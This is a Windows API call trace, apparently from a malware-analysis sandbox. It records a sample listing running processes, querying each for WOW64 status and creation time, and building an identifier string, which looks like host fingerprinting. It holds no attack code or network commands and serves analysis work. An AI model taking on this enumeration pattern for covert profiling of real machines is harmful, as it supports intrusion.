	[0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397e9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x67c
	[0084.482] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.482] CloseHandle (hObject=0x67c) returned 1
	[0084.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397ea88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396eb30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x67c
	[0084.483] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.483] CloseHandle (hObject=0x67c) returned 1
	[0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x67c
	[0084.484] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.484] CloseHandle (hObject=0x67c) returned 1
	[0084.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x67c
	[0084.484] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.484] CloseHandle (hObject=0x67c) returned 1
	[0084.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x67c
	[0084.484] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.484] CloseHandle (hObject=0x67c) returned 1
	[0084.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397ea88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x67c
	[0084.484] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.484] CloseHandle (hObject=0x67c) returned 1
	[0084.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396e750, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x67c
	[0084.485] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.485] CloseHandle (hObject=0x67c) returned 1
	[0084.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397eaa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x67c
	[0084.485] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.485] CloseHandle (hObject=0x67c) returned 1
	[0084.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x67c
	[0084.487] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.487] CloseHandle (hObject=0x67c) returned 1
	[0084.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x67c
	[0084.488] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.488] CloseHandle (hObject=0x67c) returned 1
	[0084.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x67c
	[0084.488] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.488] CloseHandle (hObject=0x67c) returned 1
	[0084.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396e870, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x67c
	[0084.490] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.490] CloseHandle (hObject=0x67c) returned 1
	[0084.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e870, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x67c
	[0084.490] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.490] CloseHandle (hObject=0x67c) returned 1
	[0084.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c910, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x67c
	[0084.491] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.491] CloseHandle (hObject=0x67c) returned 1
	[0084.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e7d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x67c
	[0084.492] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.492] CloseHandle (hObject=0x67c) returned 1
	[0084.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a1b78, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x67c
	[0084.492] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.492] CloseHandle (hObject=0x67c) returned 1
	[0084.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x67c
	[0084.493] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.493] CloseHandle (hObject=0x67c) returned 1
	[0084.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x67c
	[0084.493] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.493] CloseHandle (hObject=0x67c) returned 1
	[0084.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x67c
	[0084.494] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.494] CloseHandle (hObject=0x67c) returned 1
	[0084.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396eb30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x67c
	[0084.494] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.494] CloseHandle (hObject=0x67c) returned 1
	[0084.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x67c
	[0084.495] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.496] CloseHandle (hObject=0x67c) returned 1
	[0084.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x67c
	[0084.496] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.496] CloseHandle (hObject=0x67c) returned 1
	[0084.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x67c
	[0084.497] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.497] CloseHandle (hObject=0x67c) returned 1
	[0084.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1920, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x67c
	[0084.497] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.497] CloseHandle (hObject=0x67c) returned 1
	[0084.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x67c
	[0084.498] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.498] CloseHandle (hObject=0x67c) returned 1
	[0084.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x67c
	[0084.499] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.499] CloseHandle (hObject=0x67c) returned 1
	[0084.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396e870, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x67c
	[0084.499] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.499] CloseHandle (hObject=0x67c) returned 1
	[0084.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x67c
	[0084.500] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.500] CloseHandle (hObject=0x67c) returned 1
	[0084.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396e8b0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x67c
	[0084.500] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.500] CloseHandle (hObject=0x67c) returned 1
	[0084.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1830, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x67c
	[0084.501] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.501] CloseHandle (hObject=0x67c) returned 1
	[0084.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a1bc8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x67c
	[0084.501] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.501] CloseHandle (hObject=0x67c) returned 1
	[0084.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x67c
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.502] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.503] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.503] GetProcessTimes (in: hProcess=0x67c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.503] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] wsprintfA (in: param_1=0x3971bd8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
